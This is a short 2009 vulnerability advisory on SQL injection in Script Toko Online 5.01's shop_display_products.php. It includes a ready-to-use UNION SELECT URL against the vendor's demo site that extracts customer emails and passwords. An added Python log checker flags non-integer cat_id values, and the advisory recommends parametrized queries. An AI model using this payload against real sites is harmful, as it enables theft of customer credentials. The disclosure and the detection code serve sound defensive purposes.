
# Title : Script Toko Online 5.01 (shop_display_products.php) SQL Injection Vuln
# Published : 2009-01-26
# Author : k1n9k0ng


+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts         : Script Toko Online v5.01
Scripts site    : http://www.gempar.com/
Discovered By   : k1n9k0ng
My Site         : http://www.sekuritionline.net
IRC Channel     : #sekuritionline
Special To      : adhietslank, cyberlog, cah_gemblunkz, jayoes, thesims, setiawan, fl3xu5, k1tk4t
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Demo Site :
http://www.gempar.com/demotoko/

Bug Found:
http://www.gempar.com/demotoko/shop_display_products.php?cat_id=-1 union select concat(email,0x3a,password),1,2,3,4,5,6,7 from naxtor_cart_store_customer/*
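
Added example (not part of the original advisory and not the vendor's code): a log check that flags requests to shop_display_products.php whose cat_id is not a plain decimal integer, which is how the request above shows up in a web server access log. The log lines are constructed, and treating legitimate category IDs as non-negative integers is an assumption about the application.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format). Client addresses,
# timestamps and sizes are made up; the second request is the one from the advisory.
SAMPLE_LOG = [
    '198.51.100.7 - - [26/Jan/2009:10:00:01 +0000] "GET /demotoko/shop_display_products.php?cat_id=3 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [26/Jan/2009:10:00:05 +0000] "GET /demotoko/shop_display_products.php?cat_id=-1%20union%20select%20concat(email,0x3a,password),1,2,3,4,5,6,7%20from%20naxtor_cart_store_customer/* HTTP/1.1" 200 731',
    '198.51.100.9 - - [26/Jan/2009:10:00:09 +0000] "GET /demotoko/shop_display_products.php?cat_id=2&cat_id=2%2F%2A HTTP/1.1" 200 512',
    '198.51.100.3 - - [26/Jan/2009:10:00:11 +0000] "GET /demotoko/index.php?cat_id=abc HTTP/1.1" 200 900',
]

# Client address, then the request target; the lazy group tolerates
# unencoded spaces inside the target.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:[A-Z]+) (.+?) HTTP/[\d.]+"')
TARGET_SCRIPT = "shop_display_products.php"
# Assumption: a legitimate cat_id is a non-negative decimal integer.
PLAIN_INT = re.compile(r"[0-9]+")


def suspicious_cat_id(log_lines):
    """Return (client, decoded cat_id) for every non-integer cat_id value."""
    findings = []
    for line in log_lines:
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target = match.groups()
        url = urlsplit(target)
        if not url.path.endswith("/" + TARGET_SCRIPT):
            continue
        # parse_qs percent-decodes each value and keeps repeated parameters,
        # so a second cat_id appended after a clean one is checked as well.
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get("cat_id", []):
            if not PLAIN_INT.fullmatch(value):
                findings.append((client, value))
    return findings


if __name__ == "__main__":
    for client, value in suspicious_cat_id(SAMPLE_LOG):
        print(f"{client}: cat_id={value!r}")
```

The same allowlist belongs in the application itself: reject or integer-cast cat_id before it reaches the query, and bind it as a parameter rather than concatenating it into SQL.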

# www.Syue.com [2009-01-26]